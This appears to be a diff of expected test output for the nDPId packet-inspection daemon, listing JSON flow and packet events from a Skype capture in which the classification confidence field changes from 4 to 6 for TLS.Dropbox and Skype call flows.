00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1431969649862,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"thread_ts_msec":1431969649862,"pkt":"PBXCt3IO0NQSxnP1CABFAAFJCUdAADQGY89soKouwKgBIgG7wSW4YeeiqCbN0IAYAEgh+QAAAQEICmF6dG0+IfU9FwMBARD7Uh6I13FzmcC+6gIV5n6AJhrBsHNwxcug1X4hBQozb5rifdWfxFgx5N7\/STRCna2lXcJzFlsdHwFqwb5pWB6kc7KLSFtZJ1+xqs\/LWpjXKXVYWA3FemYFVDyRXOngCpgT23pGW6q+fdoixXKwG46vp4NCAhC8D9JiN3KitsOr260NevBFtGudn3qUJfX\/3DhGLatA0j+U2CwrLM6DTOg9xpgfiq+azd0+zhMP0HAm0WOjBrmnGfTNcgHh+iJmkjL5sJ7TuSOU5HIOWUg6nL2f38I4\/Fmt1UsWozkMatK9FYjzbVIEXXgeh7hu8fTbVAUDu9Avc4N0XIcK0QG830wTIghFDiessVKi+sWFRr4k9g=="} 
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969649862,"flow_last_seen":1431969649862,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431969649862,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969649862,"flow_last_seen":1431969649862,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431969649862,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1431969649862,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969649862,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05cZAAEAGfGTAqAEibKCqLsElAbuoJs3QuGHot4AQD\/f34wAAAQEICj4iqE1henRt"} 
01768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1431969649865,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1020,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1020,"pkt_l4_len":986,"thread_ts_msec":1431969649865,"pkt":"0NQSxnP1PBXCt3IOCABFAAPu\/qxAAEAGX8TAqAEibKCqLsElAbuoJs3QuGHot4AYEACQpAAAAQEICj4iqE9henRtFwMBACCGlFiiXnGNbnUA8eFNVg97y26hgjzRrXr8V0YtIj6nMBcDAQOQKBOjiVJxpWdYeLLT\/Xbro3HQPBzjJPC4nFo8EDiP\/qwXTbKKHYw0zh5BjL36gX1CXDX+RahFJG73NIEjJWIM604+RslBUiVdP7BtOTwH9Na9fDbxf2Np60NBtc7IDn0njVPn\/OQFpDztHwH7ReKVzxI3mekCkJeQu5frlXMtzYs\/A6\/788RG\/9eQL\/SpUlGx+OzCYIvqD3TfRfjbcI0rUIMK13b81m\/QfwBa7fmPZMBLpKLV+owE6zVvsZhb2YounO4vXImcKbLXc+pHduRZUFgR7JTndx4BwWKNOeOJb0lOXmVFpPD2t5ChyQpB8B7yAVMimVYrMkRjOI+yOmuEWzpBBb71HAu2RXfIAr1ik+\/qd4k78SdOCRVzA9X9FlfHQtMw2+\/RMHqj5tfPuEb1dJqljOBer+yTyAiFyXzsxxDLI9ugRcdcvYukWjNLVzxsQTVIpyochPhHmfXZ5n\/eZ4dJphlsEijiHWw2q71oBZmMc5GGD6vO7ZjLO3AJWFPWmwoscaJzsLs58ocuQ2qdcOCA7GGVHN\/ijVl75hciIPcfOvLZ6urcFhUq1WWuqtEbVnfmbri38YkIXbc7ejHLENq2QCqsgj5enMQz75I2\/pet\/YCSsRs1eqVYMNg8xjXCKqSJQl62\/bTcGsNwyoxippOcJq8VpG7H7Fvy+AXb68gGTkeGTRQKqtF74u9vbasRDNwPq8\/DPKRvzqNHk914l9uHQ2AKRiwOC\/bnlDR9ocQFekQhsprf\/xDrXO7tscQNAKBRL+tD76zQwjIPz3PJEHN3Pc+QE5WHu5rFSvvxfz\/Z2\/HSf2Um2ZE3koBnXh0ea61MNA9NADFAPSD8Z5NIyJgusH5hoNWKXVoIkzU5GHgbwG14JuajpHBJlMNEXsfmLLVK9oYSSz6nK+qKkyM3mC7X8XBCMQsh\/0ouHgH6HndraUIKsjtp3JPkKjI4aYdJ0qIoz0PG\/x3wOUA4h1YDaa67wXVn4YAKaKBMtrlL40SzVa5Z91cUYV13ZvBCGjlszRtWPZdtD1L\/SaFfIp1tQJKNS\/3Rzkx+IjbAX1llTBgWy3mJMF73JAKDegzbMvdSvKJ6AUv810GsIeQ99gKRkiy\/yhCs7P73CjnzDITEbSmsOsmYIQAoX97vBTFy0OqF392JfqJYzpguRdJo39kQQV95yc415TouOPz9jkaLSSogaYBmY8ija5cax3+df915"} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969652367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1431969652367,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969652367,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+qlYAAEARtuTAqAEiQAQXpjLdnFYAKjPsm5AC0vz7eA6m1WQz3XSdSXIE0xPsZ0Mgdb244ufZVMBp9g=="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969652367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969652367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1431969653376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969653376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4KG4AAEARcKrAqAEinTeCmzLdnFQAJDcMm5ICyNK5iZjkkcxv0MQR2rwmgaeyTFibCj82iA=="} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1431969653376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969653376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6eUkAAEARgjTAqAEib91NjjLdnFcAJt55m5QCPbPKJuLeDOim50Iw20p93HTUvcQYvwIjUtlP"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1431969653376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969653376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/jgcAAEARcPDAqAEib91KDzLdnFgAK3qlm5YCVGMQ34A4D4rgbT25j64U\/rdJx+5zd3Em6+QXhoxyxA8="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":506,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1431969653376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969653376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5a+4AAEARkvDAqAEib91KLjLdnFsAJRNlm5gCrA8YBMpkQAilpoWSkSOFSSJ7mpap5i7P8hQ="} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":506,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":506,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1431969653376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969653376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0K\/cAAEARbLHAqAEiQTffDzLdnFoAIDycm5oCpFKxpTcQMqT3s1qudFIeHwatW0Yo"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1431969654389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969654389,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2YJcAAEARmtjAqAEib91NoDLdnFwAInstm5wC0d61W0FRabgFV8W1nkBP2OEpO4vgeHY="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1431969654389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969654389,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYWsAAEARhiPAqAEinTg0HDLdnEkALM83m54CE+gbUNd25CDT9n3foWmJBdcqOFnduxapZrLe74dYiza3"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":511,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1431969654389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969654389,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwK8AAEARb0vAqAEinTfrsDLdnFYALGUnm6AC1ZExgfTg8R8Kk2ngcBhiodhOGddomI+8IvUKr50t+FQG"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 